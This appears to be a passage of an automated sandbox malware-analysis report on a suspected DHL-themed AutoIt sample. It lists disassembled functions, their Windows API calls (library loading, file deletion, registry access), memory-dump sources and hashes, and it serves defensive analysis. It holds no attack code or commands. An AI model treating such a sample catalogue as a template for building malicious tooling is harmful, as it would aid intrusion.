                                                                                      • String ID: msctls_updown32$p]
                                                                                      • API String ID: 4014797782-2327732127
                                                                                      • Opcode ID: c90317a6cdccb7faa2bb752a64735539e376221d574c947a2858013827d8cd6b
                                                                                      • Instruction ID: 9c90a4b2d80dd4943057b60e4c428fbe639b8d72d48f621bfb7f32a21bfc567a
                                                                                      • Opcode Fuzzy Hash: c90317a6cdccb7faa2bb752a64735539e376221d574c947a2858013827d8cd6b
                                                                                      • Instruction Fuzzy Hash: E9215CB5604208AFEB11DF64DC91EAB37EDEB4A3A8B040159FA049B352CB71EC51CB60
                                                                                      Function 000C2F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 000C2F8D
                                                                                      • LoadLibraryW.KERNEL32(?), ref: 000C2F94
                                                                                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 000C2FA9
                                                                                      • DestroyWindow.USER32(?), ref: 000C2FB1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                      • String ID: SysAnimate32
                                                                                      • API String ID: 3529120543-1011021900
                                                                                      • Opcode ID: 100f4882cafac72c385293d565a669e915cf3c5af4cea67909d03b528858d35e
                                                                                      • Instruction ID: 18da10f83344b2438dbb1aff751c2f6d216a065a2675f4c2b1c49ce40dfee653
                                                                                      • Opcode Fuzzy Hash: 100f4882cafac72c385293d565a669e915cf3c5af4cea67909d03b528858d35e
                                                                                      • Instruction Fuzzy Hash: 83218672200209ABEB218FA4DC80FBF77B9EB59364F10423DFA54965A0D671DC929760
                                                                                      Function 000C8FC9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00049BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00049BB2
                                                                                      • GetCursorPos.USER32(?), ref: 000C9001
                                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00087711,?,?,?,?,?), ref: 000C9016
                                                                                      • GetCursorPos.USER32(?), ref: 000C905E
                                                                                      • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00087711,?,?,?), ref: 000C9094
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                      • String ID: p]
                                                                                      • API String ID: 2864067406-1923361398
                                                                                      • Opcode ID: 82bd185476148864771cd8e55974df4087db3ea4d030abc67abf04812ccd79c1
                                                                                      • Instruction ID: 31fe7bff27e73371338bb172d6dd8d8ab8892d87415811b3e1e8b6cf347743c5
                                                                                      • Opcode Fuzzy Hash: 82bd185476148864771cd8e55974df4087db3ea4d030abc67abf04812ccd79c1
                                                                                      • Instruction Fuzzy Hash: 67219C35600118FFDB258F94C858FEE7BF9EB89350F244069F9058B2A1C3759990DB60
                                                                                      Function 00054D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00054D1E,000628E9,?,00054CBE,000628E9,000F88B8,0000000C,00054E15,000628E9,00000002), ref: 00054D8D
                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00054DA0
                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,00054D1E,000628E9,?,00054CBE,000628E9,000F88B8,0000000C,00054E15,000628E9,00000002,00000000), ref: 00054DC3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                      • API String ID: 4061214504-1276376045
                                                                                      • Opcode ID: 1c6fc0a6c5c45ae69df1da91e6e02f616145db8daec020c8706c256f638d124e
                                                                                      • Instruction ID: ae99454ce7809b09e65a77067d877e355af7b897ac9b877d4b4601e1c914f2a6
                                                                                      • Opcode Fuzzy Hash: 1c6fc0a6c5c45ae69df1da91e6e02f616145db8daec020c8706c256f638d124e
                                                                                      • Instruction Fuzzy Hash: 0EF03C34A40208ABFB119B91DC49FEEBBF5EF44756F0400A5ED09A6260CB745A84DAA1
                                                                                      Function 0008D3A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32 ref: 0008D3AD
                                                                                      • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0008D3BF
                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 0008D3E5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                      • String ID: GetSystemWow64DirectoryW$X64
                                                                                      • API String ID: 145871493-2590602151
                                                                                      • Opcode ID: 76fd550c57751fcdc1f0d0b0c3082e7f6a04b5db6747051baa73c4357b6b575a
                                                                                      • Instruction ID: 305bc779e533fb76bb0e11053e76d874639cd1aee333fd983066eb9d81c460b6
                                                                                      • Opcode Fuzzy Hash: 76fd550c57751fcdc1f0d0b0c3082e7f6a04b5db6747051baa73c4357b6b575a
                                                                                      • Instruction Fuzzy Hash: 65F02770405521ABF7713710CC24D6D7710BF21701F544317E889F2085CB24CE408782
                                                                                      Function 00034E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00034EDD,?,00101418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00034E9C
                                                                                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00034EAE
                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00034EDD,?,00101418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00034EC0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                      • API String ID: 145871493-3689287502
                                                                                      • Opcode ID: aa718e638e498757b1d752df10f75b8023764fcaf30734eda3ebb9f1f37d6541
                                                                                      • Instruction ID: 7fa502b466a8f14d8a771a43eff0fa5f36cef0c688b609e25665f9d80ea38070
                                                                                      • Opcode Fuzzy Hash: aa718e638e498757b1d752df10f75b8023764fcaf30734eda3ebb9f1f37d6541
                                                                                      • Instruction Fuzzy Hash: F0E0CD35E025225BF2731726EC18F6F759CAFC2F62F090115FD08D6110DB74DD0240A0
                                                                                      Function 00034E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00073CDE,?,00101418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00034E62
                                                                                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00034E74
                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00073CDE,?,00101418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00034E87
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                      • API String ID: 145871493-1355242751
                                                                                      • Opcode ID: 06cb985543c46199f4a94769b046ec5e619bff00830c2900abf25c3633b75225
                                                                                      • Instruction ID: fd6b52087604cb1edace48b71b1686ef44f128de4d1be8e9e20b7805669c7b7a
                                                                                      • Opcode Fuzzy Hash: 06cb985543c46199f4a94769b046ec5e619bff00830c2900abf25c3633b75225
                                                                                      • Instruction Fuzzy Hash: 20D0C232902A215776231B26EC18E8F3A5CAF82F217090114FE08AA110CF24CD0281D0
                                                                                      Function 000A2947 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 000A2C05
                                                                                      • DeleteFileW.KERNEL32(?), ref: 000A2C87
                                                                                      • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 000A2C9D
                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 000A2CAE
                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 000A2CC0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$Delete$Copy
                                                                                      • String ID:
                                                                                      • API String ID: 3226157194-0
                                                                                      • Opcode ID: fc95fb687aaa467f10bddac81de230d12de13ffdb9fc4a19c30d23934133bbdd
                                                                                      • Instruction ID: 44bbc15a8ef6fa58dec5c0ca6bdba68796d5ead040726d42f86482692e384646
                                                                                      • Opcode Fuzzy Hash: fc95fb687aaa467f10bddac81de230d12de13ffdb9fc4a19c30d23934133bbdd
                                                                                      • Instruction Fuzzy Hash: 5EB15D71900119ABDF25DBE8CC85EDEB7BDEF49350F1040A6FA09E6152EB319A448F61
                                                                                      Function 000BA387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCurrentProcessId.KERNEL32 ref: 000BA427
                                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 000BA435
                                                                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 000BA468
                                                                                      • CloseHandle.KERNEL32(?), ref: 000BA63D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                      • String ID:
                                                                                      • API String ID: 3488606520-0
                                                                                      • Opcode ID: 84d452792a690b695d6992e17e016b56910cf8f38e85aff711c9fbddf6fe9a0f
                                                                                      • Instruction ID: 0c39c7852a2acdb076bb9b887cc3dce990163d1f5a8053a072280e3559fd9a72
                                                                                      • Opcode Fuzzy Hash: 84d452792a690b695d6992e17e016b56910cf8f38e85aff711c9fbddf6fe9a0f
                                                                                      • Instruction Fuzzy Hash: A0A1A2B1604701AFE720DF24C886F6AB7E5AF84714F14881DF69ADB392D770ED418B92
                                                                                      Function 0006BB27 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,000D3700), ref: 0006BB91
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,0010121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0006BC09
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00101270,000000FF,?,0000003F,00000000,?), ref: 0006BC36
                                                                                      • _free.LIBCMT ref: 0006BB7F
                                                                                        • Part of subcall function 000629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0006D7D1,00000000,00000000,00000000,00000000,?,0006D7F8,00000000,00000007,00000000,?,0006DBF5,00000000), ref: 000629DE
                                                                                        • Part of subcall function 000629C8: GetLastError.KERNEL32(00000000,?,0006D7D1,00000000,00000000,00000000,00000000,?,0006D7F8,00000000,00000007,00000000,?,0006DBF5,00000000,00000000), ref: 000629F0
                                                                                      • _free.LIBCMT ref: 0006BD4B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                      • String ID:
                                                                                      • API String ID: 1286116820-0
                                                                                      • Opcode ID: 79d47e4ddf8b71e286c5fd14da9104088c0625032a4f378241879e1395d84114
                                                                                      • Instruction ID: d39894f3010eb33122d0f62e9c0b97f992a288ae6d17b471eacd4a87b7ac39e2
                                                                                      • Opcode Fuzzy Hash: 79d47e4ddf8b71e286c5fd14da9104088c0625032a4f378241879e1395d84114
                                                                                      • Instruction Fuzzy Hash: 2351D8B1900219AFDB20DF65DC819AEB7FAEF40360B10426AE554D7292EB749FC18B50
                                                                                      Function 0009E3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 0009DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0009CF22,?), ref: 0009DDFD
                                                                                        • Part of subcall function 0009DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0009CF22,?), ref: 0009DE16
                                                                                        • Part of subcall function 0009E199: GetFileAttributesW.KERNEL32(?,0009CF95), ref: 0009E19A
                                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 0009E473
                                                                                      • MoveFileW.KERNEL32(?,?), ref: 0009E4AC
                                                                                      • _wcslen.LIBCMT ref: 0009E5EB
                                                                                      • _wcslen.LIBCMT ref: 0009E603
                                                                                      • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0009E650
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                      • String ID:
                                                                                      • API String ID: 3183298772-0
                                                                                      • Opcode ID: ca9f9493f9fab2a36793e0b5b765e3d1801730a8766c6cedadec83363495c5e9
                                                                                      • Instruction ID: 9b4d456def73e08312c04bea2c2009a0508a6ba5685c76040a9087bd311efcbe
                                                                                      • Opcode Fuzzy Hash: ca9f9493f9fab2a36793e0b5b765e3d1801730a8766c6cedadec83363495c5e9
                                                                                      • Instruction Fuzzy Hash: 1D5151B24083859BDB64DB90D8919DF73ECAF85340F00491EF689D3192EF74A6889766
                                                                                      Function 000BB9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                                                                        • Part of subcall function 000BC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,000BB6AE,?,?), ref: 000BC9B5
                                                                                        • Part of subcall function 000BC998: _wcslen.LIBCMT ref: 000BC9F1
                                                                                        • Part of subcall function 000BC998: _wcslen.LIBCMT ref: 000BCA68
                                                                                        • Part of subcall function 000BC998: _wcslen.LIBCMT ref: 000BCA9E
                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 000BBAA5
                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 000BBB00
                                                                                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 000BBB63
                                                                                      • RegCloseKey.ADVAPI32(?,?), ref: 000BBBA6
                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 000BBBB3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                      • String ID:
                                                                                      • API String ID: 826366716-0
                                                                                      • Opcode ID: a9b84867dd1b90dc9eef7f5ba8d0410f89b6bce78e3da367a3249b1f9078358b
                                                                                      • Instruction ID: 5b8a3b6fb320df49dc0649e791a967c818ab36f9f6d24b3c45223a70e69f251f
                                                                                      • Opcode Fuzzy Hash: a9b84867dd1b90dc9eef7f5ba8d0410f89b6bce78e3da367a3249b1f9078358b
                                                                                      • Instruction Fuzzy Hash: 7361B231208241EFD714DF14C890EAABBE9FF84308F54855DF4998B2A2DBB1ED45CB92
                                                                                      Function 00098BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • VariantInit.OLEAUT32(?), ref: 00098BCD
                                                                                      • VariantClear.OLEAUT32 ref: 00098C3E
                                                                                      • VariantClear.OLEAUT32 ref: 00098C9D
                                                                                      • VariantClear.OLEAUT32(?), ref: 00098D10
                                                                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00098D3B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Variant$Clear$ChangeInitType
                                                                                      • String ID:
                                                                                      • API String ID: 4136290138-0
                                                                                      • Opcode ID: fabd1198de1af50a6ca091954a387c7b472c529e0bfcd900005526058945e37d
                                                                                      • Instruction ID: 7e7b9e5f4a6e107aa4bc15f98bd8b17c0405ae819c3ebd72f59a45b93c98794c
                                                                                      • Opcode Fuzzy Hash: fabd1198de1af50a6ca091954a387c7b472c529e0bfcd900005526058945e37d
                                                                                      • Instruction Fuzzy Hash: 145146B5A01219EFDB14CF68C894EAAB7F8FF89310F158569E909DB350E734E911CB90
                                                                                      Function 000A8AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 000A8BAE
                                                                                      • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 000A8BDA
                                                                                      • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 000A8C32
                                                                                      • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 000A8C57
                                                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 000A8C5F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: PrivateProfile$SectionWrite$String
                                                                                      • String ID:
                                                                                      • API String ID: 2832842796-0
                                                                                      • Opcode ID: 3c7f884429c1c8dc627d4e0a6b67827719c5bb3a21040c78174c72055d9894cc
                                                                                      • Instruction ID: ee50e44bbc16235a28d303c08a9254758ff4168a8aa626f80e38563f90080a70
                                                                                      • Opcode Fuzzy Hash: 3c7f884429c1c8dc627d4e0a6b67827719c5bb3a21040c78174c72055d9894cc
                                                                                      • Instruction Fuzzy Hash: 4C515975A00619AFDB15DF65C880EAABBF5FF49314F088058E849AB362CB35ED51CF90
                                                                                      Function 000B8EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadLibraryW.KERNEL32(?,00000000,?), ref: 000B8F40
                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 000B8FD0
                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 000B8FEC
                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 000B9032
